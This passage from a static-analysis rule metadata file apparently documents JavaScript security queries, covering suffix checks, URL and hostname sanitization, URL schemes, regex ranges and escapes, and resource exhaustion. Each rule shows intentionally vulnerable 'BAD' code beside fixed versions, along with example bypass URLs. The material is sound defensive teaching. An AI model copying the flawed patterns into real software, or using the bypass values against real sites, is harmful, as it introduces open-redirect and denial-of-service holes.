lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n  return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n  let index = x.lastIndexOf(y);\n  return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Incorrect suffix check\nThe `indexOf` and `lastIndexOf` methods are sometimes used to check if a substring occurs at a certain position in a string. However, if the returned index is compared to an expression that might evaluate to -1, the check may pass in some cases where the substring was not found at all.\n\nSpecifically, this can easily happen when implementing `endsWith` using `indexOf`.\n\n\n## Recommendation\nUse `String.prototype.endsWith` if it is available. Otherwise, explicitly handle the -1 case, either by checking the relative lengths of the strings, or by checking if the returned index is -1.\n\n\n## Example\nThe following example uses `lastIndexOf` to determine if the string `x` ends with the string `y`:\n\n\n```javascript\nfunction endsWith(x, y) {\n  return x.lastIndexOf(y) === x.length - y.length;\n}\n\n```\nHowever, if `y` is one character longer than `x`, the right-hand side `x.length - y.length` becomes -1, which then equals the return value of `lastIndexOf`. This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n  let index = x.lastIndexOf(y);\n  return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["security","correctness","external/cwe/cwe-020"],"description":"Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled.","id":"js/incorrect-suffix-check","kind":"problem","name":"Incorrect suffix check","precision":"high","problem.severity":"error","security-severity":"7.8"}},{"id":"js/incomplete-url-substring-sanitization","name":"js/incomplete-url-substring-sanitization","shortDescription":{"text":"Incomplete URL substring sanitization"},"fullDescription":{"text":"Security checks on the substrings of an unparsed URL are often vulnerable to bypassing."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param(\"url\");\n    // BAD: the host of `url` may be controlled by an attacker\n    if (url.includes(\"example.com\")) {\n        res.redirect(url);\n    }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param(\"url\"),\n        host = urlLib.parse(url).host;\n    // BAD: the host of `url` may be controlled by an attacker\n    if (host.includes(\"example.com\")) {\n        res.redirect(url);\n    }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param('url'),\n        host = urlLib.parse(url).host;\n    // GOOD: the host of `url` can not be controlled by an attacker\n    let allowedHosts = [\n        'example.com',\n        'beta.example.com',\n        'www.example.com'\n    ];\n    if (allowedHosts.includes(host)) {\n        res.redirect(url);\n    }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Incomplete URL substring sanitization\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Usually, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nHowever, treating the URL as a string and checking if one of the allowed hosts is a substring of the URL is very prone to errors. Malicious URLs can bypass such security checks by embedding one of the allowed hosts in an unexpected location.\n\nEven if the substring check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when the check succeeds accidentally.\n\n\n## Recommendation\nParse a URL before performing a check on its host value, and ensure that the check handles arbitrary subdomain sequences correctly.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param(\"url\");\n    // BAD: the host of `url` may be controlled by an attacker\n    if (url.includes(\"example.com\")) {\n        res.redirect(url);\n    }\n});\n\n```\nThe substring check is, however, easy to bypass. For example by embedding `example.com` in the path component: `http://evil-example.net/example.com`, or in the query string component: `http://evil-example.net/?x=example.com`. Address these shortcomings by checking the host of the parsed URL instead:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param(\"url\"),\n        host = urlLib.parse(url).host;\n    // BAD: the host of `url` may be controlled by an attacker\n    if (host.includes(\"example.com\")) {\n        res.redirect(url);\n    }\n});\n\n```\nThis is still not a sufficient check as the following URLs bypass it: `http://evil-example.com` `http://example.com.evil-example.net`. Instead, use an explicit whitelist of allowed hosts to make the redirect secure:\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param('url'),\n        host = urlLib.parse(url).host;\n    // GOOD: the host of `url` can not be controlled by an attacker\n    let allowedHosts = [\n        'example.com',\n        'beta.example.com',\n        'www.example.com'\n    ];\n    if (allowedHosts.includes(host)) {\n        res.redirect(url);\n    }\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020"],"description":"Security checks on the substrings of an unparsed URL are often vulnerable to bypassing.","id":"js/incomplete-url-substring-sanitization","kind":"problem","name":"Incomplete URL substring sanitization","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/incomplete-hostname-regexp","name":"js/incomplete-hostname-regexp","shortDescription":{"text":"Incomplete regular expression for hostnames"},"fullDescription":{"text":"Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param('url'),\n        host = urlLib.parse(url).host;\n    // BAD: the host of `url` may be controlled by an attacker\n    let regex = /^((www|beta).)?example.com/;\n    if (host.match(regex)) {\n        res.redirect(url);\n    }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Incomplete regular expression for hostnames\nSanitizing untrusted URLs is an important technique for preventing attacks such as request forgeries and malicious redirections. Often, this is done by checking that the host of a URL is in a set of allowed hosts.\n\nIf a regular expression implements such a check, it is easy to accidentally make the check too permissive by not escaping the `.` meta-characters appropriately. Even if the check is not used in a security-critical context, the incomplete check may still cause undesirable behaviors when it accidentally succeeds.\n\n\n## Recommendation\nEscape all meta-characters appropriately when constructing regular expressions for security checks, and pay special attention to the `.` meta-character.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains.\n\n\n```javascript\napp.get('/some/path', function(req, res) {\n    let url = req.param('url'),\n        host = urlLib.parse(url).host;\n    // BAD: the host of `url` may be controlled by an attacker\n    let regex = /^((www|beta).)?example.com/;\n    if (host.match(regex)) {\n        res.redirect(url);\n    }\n});\n\n```\nThe check is however easy to bypass because the unescaped `.` allows for any character before `example.com`, effectively allowing the redirect to go to an attacker-controlled domain such as `wwwXexample.com`.\n\nAddress this vulnerability by escaping `.` appropriately: `let regex = /^((www|beta)\\.)?example\\.com/`.\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020"],"description":"Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected.","id":"js/incomplete-hostname-regexp","kind":"problem","name":"Incomplete regular expression for hostnames","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/incomplete-url-scheme-check","name":"js/incomplete-url-scheme-check","shortDescription":{"text":"Incomplete URL scheme check"},"fullDescription":{"text":"Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\" and \"data:\" suggests a logic error or even a security vulnerability."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n    let u = decodeURI(url).trim().toLowerCase();\n    if (u.startsWith(\"javascript:\"))\n        return \"about:blank\";\n    return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n    let u = decodeURI(url).trim().toLowerCase();\n    if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n        return \"about:blank\";\n    return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n","markdown":"# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n    let u = decodeURI(url).trim().toLowerCase();\n    if (u.startsWith(\"javascript:\"))\n        return \"about:blank\";\n    return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n    let u = decodeURI(url).trim().toLowerCase();\n    if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n        return \"about:blank\";\n    return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n"},"properties":{"tags":["security","correctness","external/cwe/cwe-020","external/cwe/cwe-184"],"description":"Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\"\n              and \"data:\" suggests a logic error or even a security vulnerability.","id":"js/incomplete-url-scheme-check","kind":"problem","name":"Incomplete URL scheme check","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/overly-large-range","name":"js/overly-large-range","shortDescription":{"text":"Overly permissive regular expression range"},"fullDescription":{"text":"Overly permissive regular expression ranges match a wider range of characters than intended. This may allow an attacker to bypass a filter or sanitizer."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n    return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n    return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n    return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n    return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020"],"description":"Overly permissive regular expression ranges match a wider range of characters than intended.\n              This may allow an attacker to bypass a filter or sanitizer.","id":"js/overly-large-range","kind":"problem","name":"Overly permissive regular expression range","precision":"high","problem.severity":"warning","security-severity":"4.0"}},{"id":"js/useless-regexp-character-escape","name":"js/useless-regexp-character-escape","shortDescription":{"text":"Useless regular-expression character escape"},"fullDescription":{"text":"Prepending a backslash to an ordinary character in a string does not have any effect, and may make regular expressions constructed from this string behave unexpectedly."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n    isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n    isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020"],"description":"Prepending a backslash to an ordinary character in a string\n              does not have any effect, and may make regular expressions constructed from this string\n              behave unexpectedly.","id":"js/useless-regexp-character-escape","kind":"problem","name":"Useless regular-expression character escape","precision":"high","problem.severity":"error","security-severity":"7.8"}},{"id":"js/resource-exhaustion","name":"js/resource-exhaustion","shortDescription":{"text":"Resource exhaustion"},"fullDescription":{"text":"Allocating objects or timers with user-controlled sizes or durations can cause resource exhaustion."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n","markdown":"# Resource exhaustion\nApplications are constrained by how many resources they can make use of. Failing to respect these constraints may cause the application to be unresponsive or crash. It is therefore problematic if attackers can control the sizes or lifetimes of allocated objects.\n\n\n## Recommendation\nEnsure that attackers can not control object sizes and their lifetimes. If object sizes and lifetimes must be controlled by external parties, ensure you restrict the object sizes and lifetimes so that they are within acceptable ranges.\n\n\n## Example\nThe following example allocates a buffer with a user-controlled size.\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet buffer = Buffer.alloc(size); // BAD\n\n\t// ... use the buffer\n});\n```\nThis is problematic since an attacker can choose a size that makes the application run out of memory. Even worse, in older versions of Node.js, this could leak confidential memory. To prevent such attacks, limit the buffer size:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet buffer = Buffer.alloc(size); // GOOD\n\n\t// ... use the buffer\n});\n```\n\n## Example\nAs another example, consider an application that allocates an array with a user-controlled size, and then fills it with values:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tlet dogs = new Array(size).fill(\"dog\"); // BAD\n\n\t// ... use the dog\n});\n```\nThe allocation of the array itself is not problematic since arrays are allocated sparsely, but the subsequent filling of the array will take a long time, causing the application to be unresponsive, or even run out of memory. Again, a limit on the size will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar size = parseInt(url.parse(req.url, true).query.size);\n\n\tif (size > 1024) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tlet dogs = new Array(size).fill(\"dog\"); // GOOD\n\n\t// ... use the dogs\n});\n```\n\n## Example\nFinally, the following example lets a user choose a delay after which a function is executed:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tsetTimeout(f, delay); // BAD\n\n});\n\n```\nThis is problematic because a large delay essentially makes the application wait indefinitely before executing the function. Repeated registrations of such delays will therefore use up all of the memory in the application. A limit on the delay will prevent the attack:\n\n\n```javascript\nvar http = require(\"http\"),\n    url = require(\"url\");\n\nvar server = http.createServer(function(req, res) {\n\tvar delay = parseInt(url.parse(req.url, true).query.delay);\n\n\tif (delay > 1000) {\n\t\tres.statusCode = 400;\n\t\tres.end(\"Bad request.\");\n\t\treturn;\n\t}\n\n\tsetTimeout(f, delay); // GOOD\n\n});\n\n```\n\n## References\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n"},"properties":{"tags":["security","external/cwe/cwe-400","external/cwe/cwe-770"],"description":"Allocating objects or timers with user-controlled\n              sizes or durations can cause resource 